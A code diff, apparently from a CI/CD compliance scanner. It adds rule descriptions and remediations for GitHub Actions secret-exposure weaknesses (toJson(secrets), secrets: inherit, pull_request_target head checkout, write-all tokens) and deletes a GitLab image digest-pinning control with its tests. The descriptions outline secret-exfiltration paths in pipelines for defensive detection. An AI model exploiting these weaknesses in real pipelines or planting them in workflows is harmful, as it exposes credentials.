+ Title: "Secret accessed via a dynamic index `secrets[expr]`",
+ Description: "A workflow reads `${{ secrets[expr] }}` where `expr` is not a quoted literal β typically an `env.VAR_NAME`, `inputs.NAME`, or a computed expression. The dynamic form lets the runtime resolve the secret name at execution, which effectively hands read access to every secret the job can see to whatever source controls `expr`. When `expr` comes from a maintainer-controlled env binding the risk is theoretical, but the pattern is brittle: a rename of the named secret, or a later refactor that introduces a template expression at the indexed position, silently promotes the weakness. Prefer naming each secret directly so the grant surface is explicit in the workflow source.",
+ Remediation: "Replace `${{ secrets[env.X] }}` with a direct reference `${{ secrets.EXPECTED_NAME }}`. When a matrix really needs to select among N secrets, split the job into N copies with static names rather than indexing; the verbosity is worth the reviewability.",
+ DocURL: docsBaseURL + string(CodeSecretsDynamicIndex),
+ ControlName: "workflowMustNotIndexSecretsDynamically",
+ },
+ CodeGitHubAppSkipRevoke: {
+ Code: CodeGitHubAppSkipRevoke,
+ Severity: SeverityHigh,
+ Title: "GitHub App token issued with revocation disabled",
+ Description: "A workflow step that mints a GitHub App installation token (e.g. `actions/create-github-app-token`) sets `skip-token-revoke: true`. That keeps the minted token alive after the workflow finishes, which turns a scoped, short-lived credential into a long-lived one. Any later leak (log fragment, restored cache, exfiltrated artefact) hands the attacker a working token well after the run completes, instead of getting back a revoked one.",
+ Remediation: "Remove the `skip-token-revoke: true` input (the default is to revoke). Only keep revocation disabled for workflows that legitimately need to hand the token to a downstream step launched after this workflow β and even then, prefer re-minting it fresh in the downstream workflow.",
+ DocURL: docsBaseURL + string(CodeGitHubAppSkipRevoke),
+ ControlName: "githubAppTokensMustBeRevokedOnExit",
+ },
+ CodeSecretsOutsideEnv: {
+ Code: CodeSecretsOutsideEnv,
+ Severity: SeverityMedium,
+ Title: "Deploy / release job uses secrets without an `environment:` gate",
+ Description: "A GitHub Actions job that consumes production secrets (deploy, release, publish) does not declare an `environment:` field. Environments are the gatekeeper GitHub exposes for required reviewers, wait timers, and deployment branch rules β without one, any caller on the configured trigger goes straight to the secret-bearing step, no human-in-the-loop. Combined with a spoofable trigger (ISSUE-414) or an over-broad branch pattern, the secret can be exfiltrated without any review.",
+ Remediation: "Put production secrets behind environments. Attach the environment to the deploy job (`environment: production`) and configure required reviewers / wait timers on the environment in the repository settings.",
+ DocURL: docsBaseURL + string(CodeSecretsOutsideEnv),
+ ControlName: "deployJobsMustUseEnvironmentGate",
+ },
+ CodeOverprovisionedSecrets: {
+ Code: CodeOverprovisionedSecrets,
+ Severity: SeverityCritical,
+ Title: "Entire secrets context exported via toJson(secrets)",
+ Description: "A GitHub Actions workflow serialises the whole `secrets` context with `toJson(secrets)` or `toJSON(secrets)` and pipes the result into a step's environment, run script, or `with:` input. The resulting string contains every secret the job has access to β repository, organisation and environment β and travels through whatever downstream consumer the step passes it to (a third-party action, a remote server, a log line). Even with GitHub's automatic log redaction, a single `echo` of the JSON payload has been enough to leak tokens in past supply-chain incidents; a compromised reusable action sees them directly regardless of logging.",
+ Remediation: "Pass only the specific secrets the step needs, by name: `env: { TOKEN: ${{ secrets.NPM_TOKEN }} }`. If the step forwards credentials to a reusable workflow, name each one in the `secrets:` block of the call rather than using `toJson(secrets)`.",
+ DocURL: docsBaseURL + string(CodeOverprovisionedSecrets),
+ ControlName: "workflowMustNotExportEntireSecretsContext",
+ },
+ CodeSecretsInherit: {
+ Code: CodeSecretsInherit,
+ Severity: SeverityHigh,
+ Title: "Reusable workflow called with `secrets: inherit`",
+ Description: "A GitHub Actions job calls a reusable workflow (`jobs..uses: owner/repo/.github/workflows/x.yml@ref`) with `secrets: inherit`. The call forwards every secret visible to the caller β repo, organisation, environment β to the reusable workflow, regardless of what the reusable workflow actually needs. A compromise of the reusable workflow (upstream maintainer account, malicious PR merged on the reusable side, tag retag) then sees the full secret surface of every caller.",
+ Remediation: "Replace `secrets: inherit` with an explicit mapping that names only the secrets the reusable workflow needs: `secrets: { NPM_TOKEN: ${{ secrets.NPM_TOKEN }} }`. For internal reusable workflows hosted in the same repository the risk is lower but the principle stands β narrow the scope so a future incident exposes a minimum.",
+ DocURL: docsBaseURL + string(CodeSecretsInherit),
+ ControlName: "reusableWorkflowsMustNotInheritSecrets",
+ },
+ CodeDangerousTriggers: {
+ Code: CodeDangerousTriggers,
+ Severity: SeverityCritical,
+ Title: "Dangerous workflow trigger",
+ Description: "A GitHub Actions job is reachable via a trigger that runs with the base repository's secrets while being influenceable by an unprivileged caller (`pull_request_target`, `workflow_run`). Combined with any form of user-content checkout or template injection this becomes a direct secret-exfiltration path β the pattern behind the March 2025 tj-actions/changed-files supply-chain compromise (CVE-2025-30066).",
+ Remediation: "Prefer the standard `pull_request` trigger unless access to base-repo secrets is strictly required. If `pull_request_target` is necessary, never check out fork content and never render github.event.* / github.head_ref into shell commands. For `workflow_run`, keep the job restricted to non-secret-bearing steps.",
+ DocURL: docsBaseURL + string(CodeDangerousTriggers),
+ ControlName: "workflowMustNotUseDangerousTriggers",
+ },
+ CodeAnonymousDefinition: {
+ Code: CodeAnonymousDefinition,
+ Severity: SeverityLow,
+ Title: "Workflow has no explicit name",
+ Description: "A GitHub Actions workflow file omits the top-level `name:` field, so GitHub falls back to the file path in the Actions UI, pull-request checks, required-status-check rules, and audit logs. In a repository with many workflows this makes dashboards harder to read and β more importantly β causes the required-status-check settings to bind to file paths that change with renames, silently disabling a compliance gate.",
+ Remediation: "Add a human-readable `name: ` at the top of every workflow. Keep the name stable so branch protections and required status checks continue to match after renames.",
+ DocURL: docsBaseURL + string(CodeAnonymousDefinition),
+ ControlName: "workflowsMustHaveExplicitName",
+ },
+ CodeWorkflowMisfeature: {
+ Code: CodeWorkflowMisfeature,
+ Severity: SeverityMedium,
+ Title: "Workflow uses a known misfeature pattern",
+ Description: "A GitHub Actions workflow uses a pattern that is supported but widely considered harmful: `shell: cmd` / `shell: powershell` on Windows runners (legacy shells, weak quoting, historical CVEs), an inline pip/gem/bundler install against a network URL, or an `actions/upload-artifact` of the checkout directory (leaks `.git` including tokens if ISSUE-307 artipacked also fires).",
+ Remediation: "Switch Windows jobs to `shell: pwsh`. Vendor dependencies or use a pinned install step with checksums. Never upload the checkout directory as an artefact β upload the build output only.",
+ DocURL: docsBaseURL + string(CodeWorkflowMisfeature),
+ ControlName: "workflowMustNotUseKnownMisfeatures",
+ },
+ CodeWorkflowObfuscation: {
+ Code: CodeWorkflowObfuscation,
+ Severity: SeverityHigh,
+ Title: "Workflow script contains obfuscation (zero-width / bidi / non-ASCII homoglyphs)",
+ Description: "A GitHub Actions `run:` script or an expression carries invisible characters β zero-width spaces, bidirectional override codepoints (Trojan Source, CVE-2021-42574), or homoglyph identifiers mixing Cyrillic / Greek letters with Latin. The rendered source reads harmless on GitHub while the runner executes a different instruction. This was seen in the wild in backdoored npm / PyPI packages and has been documented as a supply-chain attack primitive since 2021.",
+ Remediation: "Strip non-ASCII characters from workflow scripts and expression references unless strictly necessary (localised strings, user-facing labels). Enable `.gitattributes` pre-commit checks that block zero-width and bidirectional Unicode in source files.",
+ DocURL: docsBaseURL + string(CodeWorkflowObfuscation),
+ ControlName: "workflowMustNotContainObfuscation",
+ },
+ CodeUseTrustedPublishing: {
+ Code: CodeUseTrustedPublishing,
+ Severity: SeverityHigh,
+ Title: "Publish step relies on a static token instead of OIDC trusted publishing",
+ Description: "A GitHub Actions workflow publishes to PyPI, npm, or Maven Central using a long-lived `API_TOKEN` / `NPM_TOKEN` / `OSSRH_USERNAME` secret instead of OIDC-backed trusted publishing. Static publish tokens are reusable from anywhere they leak to β logs, build caches, malicious dependencies β whereas OIDC tokens are short-lived and bound to a specific repository / environment / workflow.",
+ Remediation: "Migrate to trusted publishing: for PyPI set a publisher in the project settings and drop the token; for npm use the `--provenance` flag with OIDC; for Maven Central use the Sonatype portal's trusted publishing. Delete the static token once OIDC is live.",
+ DocURL: docsBaseURL + string(CodeUseTrustedPublishing),
+ ControlName: "publishWorkflowsMustUseOidcTrustedPublishing",
+ },
+ CodeDependabotMissingCooldown: {
+ Code: CodeDependabotMissingCooldown,
+ Severity: SeverityLow,
+ Title: "Dependabot ecosystem has no cooldown window",
+ Description: "An update ecosystem in `.github/dependabot.yml` declares no `cooldown:` block. Dependabot then opens a PR the instant a new upstream version is published β including when that version was uploaded minutes ago by a compromised maintainer account. A cooldown window (48β72 hours is common) gives the security-advisory pipeline time to flag a bad release before the automation merges it.",
+ Remediation: "Add a `cooldown:` block to each update ecosystem: for example `cooldown: { default-days: 3, semver-major-days: 7, include: [\"*\"] }`. Adjust the window to fit the project's patching tolerance but never skip it for ecosystems that auto-merge.",
+ DocURL: docsBaseURL + string(CodeDependabotMissingCooldown),
+ ControlName: "dependabotEcosystemsMustHaveCooldown",
+ },
+ CodeDependencyUpdateToolMissing: {
+ Code: CodeDependencyUpdateToolMissing,
+ Severity: SeverityMedium,
+ Title: "Repository has workflows but no dependency update tool",
+ Description: "The repository ships CI/CD workflows but neither `.github/dependabot.yml` nor `renovate.json` / `.renovaterc` is configured. Dependencies then drift as upstream security patches land β nothing opens the PRs that would pull them in. On a project with any third-party action pinning (which every sane workflow does), this means SHA pins go stale and every unpatched CVE for the pinned versions stays unreachable until a human remembers to refresh the locks.",
+ Remediation: "Add `.github/dependabot.yml` with at minimum `package-ecosystem: github-actions` and your primary language ecosystem (npm, pip, gomod, etc.). For more configurable flows prefer Renovate: `npx -y renovate-config-validator` validates a `renovate.json` before commit.",
+ DocURL: docsBaseURL + string(CodeDependencyUpdateToolMissing),
+ ControlName: "repositoriesMustConfigureDependencyUpdates",
+ },
+ CodeSASTWorkflowMissing: {
+ Code: CodeSASTWorkflowMissing,
+ Severity: SeverityLow,
+ Title: "No static analysis scanner runs in CI",
+ Description: "None of the repository's workflows invokes a recognised SAST scanner (CodeQL, Semgrep, SonarQube, Trivy config scan, Snyk, FOSSA, etc.). Static analysis catches whole vulnerability classes β injection, unsafe deserialisation, crypto misuse β before they reach production; leaving it out of CI means the only gate is manual review, which misses regressions exactly when the diff is large.",
+ Remediation: "Add a workflow that runs CodeQL (`github/codeql-action/init` + `analyze`, free for public repos), Semgrep, or an equivalent SAST scanner on pushes to the default branch and on pull requests. Enable GitHub's code-scanning alerts so findings open issues rather than sit in log output.",
+ DocURL: docsBaseURL + string(CodeSASTWorkflowMissing),
+ ControlName: "repositoriesMustRunSAST",
+ },
+ CodeSecurityPolicyMissing: {
+ Code: CodeSecurityPolicyMissing,
+ Severity: SeverityLow,
+ Title: "Repository has no SECURITY.md policy file",
+ Description: "The repository has no `SECURITY.md` (nor `.github/SECURITY.md`, nor `docs/SECURITY.md`) documenting the vulnerability disclosure process. Researchers who find an issue have no public contact beyond opening a GitHub issue β which defeats coordinated disclosure and teaches them to dump vulnerabilities in the open. The file can be short: two lines naming the contact channel and the expected response window are enough to move reports off the public tracker.",
+ Remediation: "Add a `SECURITY.md` at the repo root or under `.github/`. GitHub ships a template (New file β security policy). Include: the supported versions, the reporting channel (email / security@ / private advisory), the expected first-response SLA, and any bounty / safe-harbour terms the project honours.",
+ DocURL: docsBaseURL + string(CodeSecurityPolicyMissing),
+ ControlName: "repositoriesMustPublishSecurityPolicy",
+ },
+ CodeDependabotInsecureExec: {
+ Code: CodeDependabotInsecureExec,
+ Severity: SeverityCritical,
+ Title: "Dependabot re-enables insecure external code execution",
+ Description: "The repository's `.github/dependabot.yml` sets `insecure-external-code-execution: allow` for one of its update ecosystems. Dependabot will then execute install / postinstall hooks from every candidate dependency version during its version-resolution passes, giving any compromised upstream package a path to run arbitrary code in the Dependabot runner β which holds privileged access to the repository via a non-auditable push token. This is the option Dependabot itself documents as dangerous and defaults to `deny`.",
+ Remediation: "Remove the `insecure-external-code-execution: allow` entry. If a specific ecosystem genuinely requires executing upstream scripts to resolve versions, scope the allowance narrowly with `enable-beta-ecosystems: false` and pair it with a dedicated runner isolation review β do not set it repository-wide.",
+ DocURL: docsBaseURL + string(CodeDependabotInsecureExec),
+ ControlName: "dependabotMustNotAllowInsecureExternalCodeExecution",
+ },
+ CodeMissingConcurrency: {
+ Code: CodeMissingConcurrency,
+ Severity: SeverityMedium,
+ Title: "Workflow has no concurrency block",
+ Description: "A GitHub Actions workflow declares no `concurrency:` block at either the workflow or the job level. Without it, concurrent pushes to the same branch (common during rebases and force-pushes) start parallel runs that race on caches, artifact uploads, and external state β and burn runner minutes. When the workflow deploys, it can also land stale state by overtaking a newer run.",
+ Remediation: "Add a `concurrency` block that groups runs by ref: `concurrency: { group: ${{ github.workflow }}-${{ github.ref }}, cancel-in-progress: true }`. For deploy workflows, keep `cancel-in-progress: false` so an in-flight deploy finishes cleanly.",
+ DocURL: docsBaseURL + string(CodeMissingConcurrency),
+ ControlName: "workflowsMustDeclareConcurrency",
+ },
+ CodePullRequestTargetWithHeadCheckout: {
+ Code: CodePullRequestTargetWithHeadCheckout,
+ Severity: SeverityCritical,
+ Title: "pull_request_target workflow explicitly checks out the PR head",
+ Description: "A workflow triggered by `pull_request_target` calls `actions/checkout` with an explicit `ref:` pointing at the pull request's head (e.g. `github.event.pull_request.head.sha`, `github.head_ref`). This is the exact pattern behind the March 2025 tj-actions/changed-files compromise (CVE-2025-30066): the workflow has access to the base repository's secrets AND it executes code controlled by the PR author. Any shell step that runs after the checkout is a direct path to secret exfiltration. Unlike the broader dangerous-triggers check (ISSUE-414) which flags the trigger itself, this rule flags the actual exploitable combination.",
+ Remediation: "Either switch to the standard `pull_request` event (runs in the fork's context, no base-repo secrets), or remove the explicit `ref:` input so `actions/checkout` falls back to the base repository's SHA. If cross-context code must be examined, split the job: a small pull_request_target job gathers metadata, then hands off to a separate pull_request workflow that executes the fork code.",
+ DocURL: docsBaseURL + string(CodePullRequestTargetWithHeadCheckout),
+ ControlName: "pullRequestTargetMustNotCheckoutHead",
+ },
+ CodeExcessivePermissions: {
+ Code: CodeExcessivePermissions,
+ Severity: SeverityHigh,
+ Title: "Excessive workflow permissions",
+ Description: "A GitHub Actions job's effective permissions block grants `write-all`, giving its GITHUB_TOKEN write access to every API scope regardless of what the job actually needs. Paired with a compromise through injection, dangerous triggers or a malicious action, this amplifies impact to full repository control.",
+ Remediation: "Declare the narrowest permissions block that lets the job do its work. Prefer `permissions: { contents: read }` at the workflow level and grant additional scopes only on the jobs that truly need them.",
+ DocURL: docsBaseURL + string(CodeExcessivePermissions),
+ ControlName: "workflowMustNotGrantPermissionsWriteAll",
+ },
}
// LookupCode returns the ErrorCodeInfo for a given issue code, or nil if not found.
diff --git a/control/controlGitlabImageMutable.go b/control/controlGitlabImageMutable.go
deleted file mode 100644
index 3af8e62..0000000
--- a/control/controlGitlabImageMutable.go
+++ /dev/null
@@ -1,230 +0,0 @@
-package control
-
-import (
- "fmt"
- "regexp"
- "strings"
-
- "github.com/getplumber/plumber/collector"
- "github.com/getplumber/plumber/configuration"
- "github.com/getplumber/plumber/gitlab"
- "github.com/sirupsen/logrus"
-)
-
-const ControlTypeGitlabImageForbiddenTagsVersion = "0.4.0"
-
-// GitlabImageForbiddenTagsConf holds the configuration for forbidden tag detection
-type GitlabImageForbiddenTagsConf struct {
- // Enabled controls whether this check runs
- Enabled bool `json:"enabled"`
-
- // ForbiddenTags is a list of tags considered forbidden (e.g., latest, dev)
- ForbiddenTags []string `json:"forbiddenTags"`
-
- // MustBePinnedByDigest when true, every image must use an immutable digest reference (ISSUE-103 when not).
- // Forbidden tag rules still apply when tags are configured (ISSUE-102 can appear alongside ISSUE-103).
- MustBePinnedByDigest bool `json:"mustBePinnedByDigest"`
-}
-
-// GetConf loads configuration from PlumberConfig
-// If config is nil or the control section is missing, the control is disabled (skipped).
-func (p *GitlabImageForbiddenTagsConf) GetConf(plumberConfig *configuration.PlumberConfig) error {
- // Plumber config is required
- if plumberConfig == nil {
- p.Enabled = false
- return nil
- }
-
- // Get control config from PlumberConfig
- imgConfig := plumberConfig.GetContainerImageMustNotUseForbiddenTagsConfig()
- if imgConfig == nil {
- // Control not configured - disable it
- l.Debug("containerImageMustNotUseForbiddenTags control configuration is missing from .plumber.yaml file, skipping")
- p.Enabled = false
- return nil
- }
-
- // Check if enabled field is set
- if imgConfig.Enabled == nil {
- return fmt.Errorf("containerImageMustNotUseForbiddenTags.enabled field is required in .plumber.yaml config file")
- }
-
- // Check if tags field is set (required unless mustBePinnedByDigest takes over)
- if imgConfig.Tags == nil && !imgConfig.IsPinnedByDigestRequired() {
- return fmt.Errorf("containerImageMustNotUseForbiddenTags.tags field is required in .plumber.yaml config file")
- }
-
- // Apply configuration
- p.Enabled = imgConfig.IsEnabled()
- p.ForbiddenTags = imgConfig.Tags
- p.MustBePinnedByDigest = imgConfig.IsPinnedByDigestRequired()
-
- l.WithFields(logrus.Fields{
- "enabled": p.Enabled,
- "forbiddenTags": p.ForbiddenTags,
- "mustBePinnedByDigest": p.MustBePinnedByDigest,
- }).Debug("containerImageMustNotUseForbiddenTags control configuration loaded from .plumber.yaml file")
-
- return nil
-}
-
-// GitlabImageForbiddenTagsMetrics holds metrics about forbidden image tags
-type GitlabImageForbiddenTagsMetrics struct {
- Total uint `json:"total"`
- UsingForbiddenTags uint `json:"usingForbiddenTags"`
- NotPinnedByDigest uint `json:"notPinnedByDigest,omitempty"`
- PinnedByDigest uint `json:"pinnedByDigest,omitempty"`
- CiInvalid uint `json:"ciInvalid"`
- CiMissing uint `json:"ciMissing"`
-}
-
-// GitlabImageForbiddenTagsResult holds the result of the forbidden tags control
-type GitlabImageForbiddenTagsResult struct {
- Issues []GitlabPipelineImageIssueTag `json:"issues"`
- Metrics GitlabImageForbiddenTagsMetrics `json:"metrics"`
- Compliance float64 `json:"compliance"`
- Version string `json:"version"`
- CiValid bool `json:"ciValid"`
- CiMissing bool `json:"ciMissing"`
- Skipped bool `json:"skipped"` // True if control was disabled
- MustBePinnedByDigest bool `json:"mustBePinnedByDigest"` // True if digest pinning mode was active
- Error string `json:"error,omitempty"` // Error message if data collection failed
-}
-
-////////////////////
-// Control issues //
-////////////////////
-
-// GitlabPipelineImageIssueTag represents an issue with an image using a mutable tag
-type GitlabPipelineImageIssueTag struct {
- Code ErrorCode `json:"code"`
- DocURL string `json:"docUrl"`
- Link string `json:"link"`
- Tag string `json:"tag"`
- Job string `json:"job"`
-}
-
-///////////////////////
-// Control functions //
-///////////////////////
-
-// Run executes the forbidden tag detection control
-func (p *GitlabImageForbiddenTagsConf) Run(pipelineImageData *collector.GitlabPipelineImageData) *GitlabImageForbiddenTagsResult {
- l := l.WithFields(logrus.Fields{
- "control": "GitlabImageForbiddenTags",
- "controlVersion": ControlTypeGitlabImageForbiddenTagsVersion,
- "mustBePinnedByDigest": p.MustBePinnedByDigest,
- })
- l.Info("Start forbidden image tag control")
-
- result := &GitlabImageForbiddenTagsResult{
- Issues: []GitlabPipelineImageIssueTag{},
- Metrics: GitlabImageForbiddenTagsMetrics{},
- Compliance: 100.0,
- Version: ControlTypeGitlabImageForbiddenTagsVersion,
- CiValid: pipelineImageData.CiValid,
- CiMissing: pipelineImageData.CiMissing,
- Skipped: false,
- MustBePinnedByDigest: p.MustBePinnedByDigest,
- }
-
- // Check if control is enabled
- if !p.Enabled {
- l.Info("Forbidden image tag control is disabled, skipping")
- result.Skipped = true
- return result
- }
-
- // If CI is invalid or missing, return early
- if !pipelineImageData.CiValid || pipelineImageData.CiMissing {
- result.Compliance = 0.0
- if !pipelineImageData.CiValid {
- result.Metrics.CiInvalid = 1
- }
- if pipelineImageData.CiMissing {
- result.Metrics.CiMissing = 1
- }
- return result
- }
-
- // Loop over all images
- for _, image := range pipelineImageData.Images {
- pinned := isImagePinnedByDigest(image.Link)
-
- if p.MustBePinnedByDigest {
- if pinned {
- result.Metrics.PinnedByDigest++
- } else {
- result.Issues = append(result.Issues, GitlabPipelineImageIssueTag{
- Code: CodeImageNotPinnedByDigest,
- DocURL: CodeImageNotPinnedByDigest.DocURL(),
- Link: image.Link,
- Tag: image.Tag,
- Job: image.Job,
- })
- result.Metrics.NotPinnedByDigest++
- }
- }
-
- if len(p.ForbiddenTags) == 0 {
- continue
- }
- // In digest mode, only evaluate forbidden tags when the image is not digest-pinned
- // (avoids ISSUE-102 on references that are already immutable via digest).
- evaluateForbidden := !p.MustBePinnedByDigest || !pinned
- if evaluateForbidden && gitlab.CheckItemMatchToPatterns(image.Tag, p.ForbiddenTags) {
- result.Issues = append(result.Issues, GitlabPipelineImageIssueTag{
- Code: CodeImageForbiddenTag,
- DocURL: CodeImageForbiddenTag.DocURL(),
- Link: image.Link,
- Tag: image.Tag,
- Job: image.Job,
- })
- result.Metrics.UsingForbiddenTags++
- }
- }
-
- // Calculate compliance based on issues
- if len(result.Issues) > 0 {
- result.Compliance = 0.0
- l.WithField("issuesCount", len(result.Issues)).Debug("Found issues, setting compliance to 0")
- }
-
- // Set metrics
- result.Metrics.Total = uint(len(pipelineImageData.Images))
-
- l.WithFields(logrus.Fields{
- "totalImages": result.Metrics.Total,
- "forbiddenTagCount": result.Metrics.UsingForbiddenTags,
- "notPinnedByDigest": result.Metrics.NotPinnedByDigest,
- "pinnedByDigest": result.Metrics.PinnedByDigest,
- "compliance": result.Compliance,
- }).Info("Forbidden image tag control completed")
-
- return result
-}
-
-/////////////////////////////////
-// Digest pinning utility //
-/////////////////////////////////
-
-// imageDigestPattern matches a valid content digest (e.g., sha256:, sha512:).
-var imageDigestPattern = regexp.MustCompile(`^[A-Za-z][A-Za-z0-9]*(?:[+._-][A-Za-z][A-Za-z0-9]*)*:[0-9a-fA-F]{32,}$`)
-
-// isImagePinnedByDigest checks whether an image reference contains an immutable digest.
-// Returns true for references like "alpine@sha256:abc123..." and false for tag-only
-// references like "alpine:3.19" or "alpine".
-func isImagePinnedByDigest(imageLink string) bool {
- link := strings.TrimSpace(imageLink)
- if link == "" {
- return false
- }
-
- lastAt := strings.LastIndex(link, "@")
- if lastAt <= 0 || lastAt >= len(link)-1 {
- return false
- }
-
- digest := link[lastAt+1:]
- return imageDigestPattern.MatchString(digest)
-}
diff --git a/control/controlGitlabImagePinnedByDigest_test.go b/control/controlGitlabImagePinnedByDigest_test.go
deleted file mode 100644
index 3685c3a..0000000
--- a/control/controlGitlabImagePinnedByDigest_test.go
+++ /dev/null
@@ -1,295 +0,0 @@
-package control
-
-import (
- "slices"
- "strings"
- "testing"
-
- "github.com/getplumber/plumber/collector"
-)
-
-func TestIsImagePinnedByDigest(t *testing.T) {
- sha256Digest := strings.Repeat("a", 64)
- sha512Digest := strings.Repeat("b", 128)
-
- tests := []struct {
- name string
- image string
- want bool
- }{
- {
- name: "digest only",
- image: "docker.io/library/alpine@sha256:" + sha256Digest,
- want: true,
- },
- {
- name: "tag and digest",
- image: "docker.io/library/node:20@sha256:" + sha256Digest,
- want: true,
- },
- {
- name: "sha512 digest",
- image: "registry.example.com/team/app@sha512:" + sha512Digest,
- want: true,
- },
- {
- name: "tag only",
- image: "docker.io/library/alpine:3.19",
- want: false,
- },
- {
- name: "implicit latest",
- image: "docker.io/library/alpine",
- want: false,
- },
- {
- name: "digest variable",
- image: "docker.io/library/alpine@$DIGEST",
- want: false,
- },
- {
- name: "invalid digest format",
- image: "docker.io/library/alpine@sha256:not-a-hex-digest",
- want: false,
- },
- }
-
- for _, tt := range tests {
- t.Run(tt.name, func(t *testing.T) {
- got := isImagePinnedByDigest(tt.image)
- if got != tt.want {
- t.Fatalf("isImagePinnedByDigest(%q) = %v, want %v", tt.image, got, tt.want)
- }
- })
- }
-}
-
-func TestForbiddenTagsWithMustBePinnedByDigestEnabled(t *testing.T) {
- conf := &GitlabImageForbiddenTagsConf{
- Enabled: true,
- ForbiddenTags: []string{"latest"},
- MustBePinnedByDigest: true,
- }
-
- sha256Digest := strings.Repeat("a", 64)
-
- data := &collector.GitlabPipelineImageData{
- CiValid: true,
- CiMissing: false,
- Images: []collector.GitlabPipelineImageInfo{
- {
- Link: "docker.io/library/alpine@sha256:" + sha256Digest,
- Tag: "",
- Job: "build",
- },
- {
- Link: "docker.io/library/node:20",
- Tag: "20",
- Job: "test",
- },
- {
- Link: "docker.io/library/golang",
- Tag: "",
- Job: "lint",
- },
- },
- }
-
- result := conf.Run(data)
-
- if result.Skipped {
- t.Fatalf("expected control to run, but it was skipped")
- }
- if !result.MustBePinnedByDigest {
- t.Fatalf("expected MustBePinnedByDigest to be true in result")
- }
- if result.Compliance != 0 {
- t.Fatalf("expected compliance to be 0, got %v", result.Compliance)
- }
- if result.Metrics.Total != 3 {
- t.Fatalf("expected total metric to be 3, got %d", result.Metrics.Total)
- }
- if result.Metrics.PinnedByDigest != 1 {
- t.Fatalf("expected pinnedByDigest metric to be 1, got %d", result.Metrics.PinnedByDigest)
- }
- if result.Metrics.NotPinnedByDigest != 2 {
- t.Fatalf("expected notPinnedByDigest metric to be 2, got %d", result.Metrics.NotPinnedByDigest)
- }
- if len(result.Issues) != 2 {
- t.Fatalf("expected 2 issues, got %d", len(result.Issues))
- }
-}
-
-func TestDigestPinningAndForbiddenTagBothReported(t *testing.T) {
- conf := &GitlabImageForbiddenTagsConf{
- Enabled: true,
- ForbiddenTags: []string{"latest"},
- MustBePinnedByDigest: true,
- }
-
- data := &collector.GitlabPipelineImageData{
- CiValid: true,
- CiMissing: false,
- Images: []collector.GitlabPipelineImageInfo{
- {
- Link: "docker.io/golangci/golangci-lint:latest",
- Tag: "latest",
- Job: "lint",
- },
- },
- }
-
- result := conf.Run(data)
- if len(result.Issues) != 2 {
- t.Fatalf("expected 2 issues (digest + forbidden tag), got %d", len(result.Issues))
- }
- codes := []ErrorCode{result.Issues[0].Code, result.Issues[1].Code}
- if !slices.Contains(codes, CodeImageNotPinnedByDigest) || !slices.Contains(codes, CodeImageForbiddenTag) {
- t.Fatalf("expected ISSUE-103 and ISSUE-102, got codes %#v", codes)
- }
- if result.Metrics.NotPinnedByDigest != 1 {
- t.Fatalf("expected notPinnedByDigest 1, got %d", result.Metrics.NotPinnedByDigest)
- }
- if result.Metrics.UsingForbiddenTags != 1 {
- t.Fatalf("expected usingForbiddenTags 1, got %d", result.Metrics.UsingForbiddenTags)
- }
-}
-
-func TestDigestModePinnedImageWithLatestTagNoForbiddenIssue(t *testing.T) {
- conf := &GitlabImageForbiddenTagsConf{
- Enabled: true,
- ForbiddenTags: []string{"latest"},
- MustBePinnedByDigest: true,
- }
- sha := strings.Repeat("a", 64)
- data := &collector.GitlabPipelineImageData{
- CiValid: true,
- CiMissing: false,
- Images: []collector.GitlabPipelineImageInfo{
- {
- Link: "docker.io/library/node:latest@sha256:" + sha,
- Tag: "latest",
- Job: "build",
- },
- },
- }
- result := conf.Run(data)
- if len(result.Issues) != 0 {
- t.Fatalf("expected no issues when digest-pinned, got %#v", result.Issues)
- }
- if result.Metrics.PinnedByDigest != 1 || result.Metrics.UsingForbiddenTags != 0 {
- t.Fatalf("metrics: pinned=%d forbidden=%d", result.Metrics.PinnedByDigest, result.Metrics.UsingForbiddenTags)
- }
-}
-
-func TestForbiddenTagsWithMustBePinnedByDigestDisabled(t *testing.T) {
- conf := &GitlabImageForbiddenTagsConf{
- Enabled: true,
- ForbiddenTags: []string{"latest", "dev"},
- MustBePinnedByDigest: false,
- }
-
- data := &collector.GitlabPipelineImageData{
- CiValid: true,
- CiMissing: false,
- Images: []collector.GitlabPipelineImageInfo{
- {
- Link: "docker.io/library/node:20",
- Tag: "20",
- Job: "build",
- },
- {
- Link: "docker.io/library/alpine:latest",
- Tag: "latest",
- Job: "test",
- },
- },
- }
-
- result := conf.Run(data)
-
- if result.Skipped {
- t.Fatalf("expected control to run, but it was skipped")
- }
- if result.MustBePinnedByDigest {
- t.Fatalf("expected MustBePinnedByDigest to be false in result")
- }
- // Only "latest" is forbidden, "20" is fine
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue, got %d", len(result.Issues))
- }
- if result.Issues[0].Tag != "latest" {
- t.Fatalf("expected issue tag to be 'latest', got '%s'", result.Issues[0].Tag)
- }
- if result.Metrics.UsingForbiddenTags != 1 {
- t.Fatalf("expected usingForbiddenTags to be 1, got %d", result.Metrics.UsingForbiddenTags)
- }
-}
-
-func TestForbiddenTagsControlDisabled(t *testing.T) {
- conf := &GitlabImageForbiddenTagsConf{
- Enabled: false,
- MustBePinnedByDigest: true,
- }
-
- data := &collector.GitlabPipelineImageData{
- CiValid: true,
- CiMissing: false,
- Images: []collector.GitlabPipelineImageInfo{
- {
- Link: "docker.io/library/node:20",
- Tag: "20",
- Job: "build",
- },
- },
- }
-
- result := conf.Run(data)
-
- if !result.Skipped {
- t.Fatalf("expected control to be skipped")
- }
- if result.Compliance != 100 {
- t.Fatalf("expected compliance to remain 100 when skipped, got %v", result.Compliance)
- }
- if len(result.Issues) != 0 {
- t.Fatalf("expected no issues when skipped, got %d", len(result.Issues))
- }
-}
-
-func TestMustBePinnedByDigestAllPinned(t *testing.T) {
- sha256Digest := strings.Repeat("a", 64)
- conf := &GitlabImageForbiddenTagsConf{
- Enabled: true,
- MustBePinnedByDigest: true,
- }
-
- data := &collector.GitlabPipelineImageData{
- CiValid: true,
- CiMissing: false,
- Images: []collector.GitlabPipelineImageInfo{
- {
- Link: "docker.io/library/alpine@sha256:" + sha256Digest,
- Tag: "",
- Job: "build",
- },
- {
- Link: "docker.io/library/node:20@sha256:" + sha256Digest,
- Tag: "20",
- Job: "test",
- },
- },
- }
-
- result := conf.Run(data)
-
- if result.Compliance != 100 {
- t.Fatalf("expected compliance to be 100 when all pinned, got %v", result.Compliance)
- }
- if len(result.Issues) != 0 {
- t.Fatalf("expected 0 issues, got %d", len(result.Issues))
- }
- if result.Metrics.PinnedByDigest != 2 {
- t.Fatalf("expected pinnedByDigest to be 2, got %d", result.Metrics.PinnedByDigest)
- }
-}
